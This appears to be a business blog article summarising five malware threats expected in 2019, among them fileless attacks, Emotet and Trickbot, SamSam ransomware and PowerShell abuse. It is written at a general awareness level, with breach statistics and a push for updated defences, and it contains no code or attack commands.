What are the biggest malware threats to businesses right now?
Threats to businesses from malware are on the increase— there’s clearly more gain to be had online by bad actors as increasing portions of life and commerce move to an electronic medium.
Additionally, the digital domain itself offers a range of services to would-be infiltrators – from scripting as a service, to malware testing environments which range common security methods against new code to check its efficiency. A recent report by MalwareBytes covers some of the biggest threats facing the enterprise in the next twelve months.
So what are the elements of cybersecurity that will make the headlines (in all the wrong ways) in 2019? Here’s our top five!
FACT: HaaS (hacking as a service) exists on the worldwide and dark webs.
1. Fileless attacks
One of the more alarming trends to emerge from hackers is the prevalence of fileless attacks. These are attacks which emanate from common applications (such as a web browser, a browser extension, an Office application or media player) and lodge in the computer’s memory, rather than manifest as discrete files.
A fileless attack can begin in a manner as simple as visiting a compromised website. The site’s code can place a payload into the user’s computer through a security vulnerability from an older, unpatched browser, or a flaky plug-in, like Adobe Flash, or an old Java extension.
From there, the malware moves to the computer’s memory. It is challenging to detect and to make life more difficult for those tasked with protecting the enterprise may wait for an undisclosed time, or traverse through the network until it finds a critical server or resource.
Unnoticed malware can exfiltrate data, download further code, be activated remotely, or even shut down antimalware software on individual devices. And because of its fileless footprint, does not correspond to any known malware file ‘signature’.
FACT: The mean time to detection of a security breach was 197 days in 2017, while amelioration of a threat took 69 days.* (Ponemon/IBM study)
2. Unprotected endpoints
Fileless and other attacks target device users– the humans who come to work every day in companies and organizations all over the world. As for the devices themselves, those at risk are no longer just the desktop or laptop machines used every day in every workplace. Mobile devices brought in to work every day are also targets– protecting staff’s personal devices is suddenly as necessary as it is contentious.
Hackers and malware producers are targeting individual users at any level of the organization to an increasing degree. Meanwhile, security teams are still very much network-centric: protecting the perimeter of the LAN, yet watching infected devices be literally walked into the workplace every day.
FACT: Older versions of Android or infected USB sticks join your LAN every day.
Expensive intrusion detection systems and stateful firewalls that blanket mixed or hybridized topologies remain valuable, of course. However, by only deploying this type of protection (plus, for instance, signature-based malware recognition algorithms), SecOps teams could be accused of looking in the wrong places.
YOU MIGHT LIKE
Are IoT and IIoT safe to use in my organization?
Cybersecurity protection also needs to examine individual apps’ behavior, and analyze internal traffic, plus so-called East-West traffic in the server room or data center. Anomalous behavior and traffic patterns– especially using standard protocols– provides clues that something is awry.
FACT: Legacy apps running on older OSes may be mission-critical, but they present easier targets.
3. Emotet & Trickbot
Prime examples of next-generation malware, these two trojans/downloaders/botnets are distributed primarily by email, carried by Office documents.
Attacks are launched via Windows PowerShell, a trusted component of many desktop operating systems, which downloads and starts malware. Files downloaded are subject to mutation at their source, so it’s not uncommon for two instances of attack to present quite differently– making detection difficult.
Emotet is most active in the US, and there’s been an increase in activity in the UK, Canada, and Germany. Trickbot infections are generally brought about by non-detection of Emotet and are as a result of after-the-fact scanning.
Because of Emotet’s dynamic nature, its success will breed success, and 2019 will indubitably see more variations and infections.
FACT: In Feb 2018, Allentown, PA paid nearly $1 million to remediate an Emotet infection completely.
This brand of malware is particularly unpleasant, as it can be activated and configured remotely once an infection has taken place, meaning its activities can vary greatly, from ransomware to it allowing a third-party complete administration-level control of a compromised system.
One of the attack methods that hackers use with SamSam is to disable antimalware software manually on each infected machine. That opens up the possibilities for the hacker, allowing a catalog of malware to be installed, despite even the most complex of preventative anti-malware installations.
FACT: The City of Atlanta projected it needed to spend $2.6 million on recovering from ransomware infections.
To date in 2018, 67 different targets are known to have been hit by SamSam, and like Emotet, its success will breed variations and copycat attacks in 2019.
5. Unknown PowerShell abuses
As a scripting tool in common use at root level in Windows installations, this application is being used more commonly alongside compromised Office documents.
PowerShell is often used to download and install additional malware after initial infection. Fileless malware once ensconced in memory is difficult to detect by many security systems. Without checking process memory (the memory allocated to an application), the malware can sit and wait to deploy, traverse the network, or download and install additional threats.
FACT: In 2017, PowerShell was used in a sophisticated attack against the Saudi Arabian government, with malicious code placed by VBScript and Office macros.
White Paper: 53% of organizations have experienced an endpoint compromise within the last two years.
— Deep Instinct (@DeepInstinctSec) December 6, 2018
The future of fighting cybercrime lies in threat detection because of malware behavior, not in threat recognition. Hackers use the same methods of beta testing their products as genuine developers. As well as using the same skills as white hat cybersecurity professionals, the methods deployed are often those– like PowerShell– which systems administrators and programmers use to protect systems.
With the highest value currency today being data, organizations need to ramp up their cybersecurity provisions, bringing systems and practices up to date.
It’s a 100 percent certainty that your organization or business will experience successful data breaches. Therefore, like an employer’s liability insurance, it should be mandatory to have amelioration and recovery systems and processes in place, and practiced, at all times.
24 January 2020
24 January 2020
24 January 2020